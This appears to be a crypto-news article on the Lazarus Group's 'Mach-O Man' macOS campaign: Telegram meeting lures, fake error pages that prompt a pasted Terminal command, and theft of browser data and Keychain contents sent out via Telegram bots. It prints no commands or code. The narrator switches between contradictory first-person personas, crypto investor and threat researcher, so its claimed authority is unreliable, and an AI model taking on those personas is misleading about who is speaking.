Key Highlights
- Lazarus Group is running a macOS-focused cyber campaign called “Mach-O Man,” targeting crypto and fintech workers.
- The attack uses social engineering to trick users into running a Terminal command that installs malware to steal private information.
- The group has stolen billions in crypto over the years and continues to use more advanced methods like this campaign.
A senior blockchain security researcher at Certik reportedly said that North Korea’s Lazarus Group is running a new macOS-focused campaign called the “Mach-O Man.”
A new report indicates the campaign is focused on users of macOS who work in the cryptocurrency, financial technology, and other valuable business sectors.
How the “Mach-O Man” campaign works
According to security firm ANY.RUN, this attack typically begins on Telegram. Victims receive what appears to be a standard meeting invitation, frequently sent from a compromised account of someone they recognize and trust.
The Lazarus Group has recently launched “Mach-O Man,” a new malware specifically designed for macOS systems. It targets companies in the financial technology and cryptocurrency sectors, as well as high-profile individuals. The attack typically begins with a seemingly urgent meeting invitation sent via Telegram, leading to a realistic but fake website disguised as a Zoom, Teams, or Google Meet login page.
— Vladimir S. | Officer’s Notes (@officer_secret) April 21, 2026
The scam message then instructs the victim to start a video call using platforms like Zoom, Teams, or Meet. When they click the link, they’re taken to a fake error page claiming there’s a problem joining the call. This page asks them to copy and paste a code into the Terminal app on their Mac, supposedly to fix the issue. This is how the malicious software is installed.
After the initial command is executed, the first part of the malicious software begins to run. It then downloads a disguised application that mimics legitimate software. By utilizing standard system tools, it appears trustworthy to macOS security, allowing it to bypass initial defenses and remain undetected by users.
Inside the malware system
ANY.RUN reports that this malware is created using Go and packaged as Mach-O files, broken down into multiple pieces. It starts with a ‘stager’ component that initiates the infection. Then, it gathers details about the infected computer, such as its name, operating system, processor, network configuration, active programs, and installed browser extensions.
As a crypto investor, I’m really concerned to learn this malware scans for things like my Chrome, Safari, Firefox, Brave, Opera, and Vivaldi browsers. Apparently, all the information it finds gets sent right back to the hacker through Telegram. It’s a scary thought, knowing they’re trying to grab data from my everyday browsing.
This malware is designed to persistently remain on your system. It cleverly conceals itself within system files and automatically launches whenever you start your Mac, ensuring it survives restarts.
The last part of this process involves stealing private information like browser cookies, saved logins, and data from the macOS Keychain. This stolen information is then compressed into files and sent to the attackers through Telegram bots.
Security experts found that this malware tries to cover its tracks after stealing information. While some of its code is messy and contains errors – like accidentally revealing sensitive codes – it still functions because it relies on users unknowingly executing the harmful commands.
Why security measures matter
Crypto and fintech companies face significant risks. A single infected computer could allow hackers to steal sensitive information like wallet access codes, exchange keys, and internal tools, giving them access to company systems. This could lead to further network breaches or unauthorized financial activity.
As a researcher tracking cyber threats, I’ve observed that the Lazarus Group is responsible for numerous significant cryptocurrency attacks. Since 2017, they’ve stolen billions of dollars in digital assets. Their methods are sophisticated, combining direct hacking with social engineering and a knack for quietly infiltrating systems over extended periods.
This group has recently been connected to several major crypto thefts, including a $290 million hack of KelpDAO and an exploit on the Bybit exchange. Over the past four years, they’ve reportedly stolen around $7.3 billion from various cryptocurrency companies.
This group doesn’t just rely on hacking; they also create fake profiles and try to gain access through people working inside organizations. They slowly build their way in over time before launching an attack.
Read More
- Brent Oil Forecast
- Gold Rate Forecast
- Why Bitcoin is the New Water Cooler Topic: Decline, Drama, and Structural Weakness!
- How the SEC and Nasdaq Play Whack-a-Mole with Chinese IPO Scandals 🎭💼
- Szabo’s Bitcoin Warning: Don’t Mess It Up!
- USD PHP PREDICTION
- Why XRP’s Vanishing Act on Binance Will Leave You Gasping
- Ethereum’s Wild Ride: Will It Moon or Doom?
- Dogecoin’s Delicate Dance: 3 Scenarios That Could Change Everything
- Unbelievable! XRP Set for Overnight $40 Bliss? | Shocking Fractal Forecast
2026-04-22 19:33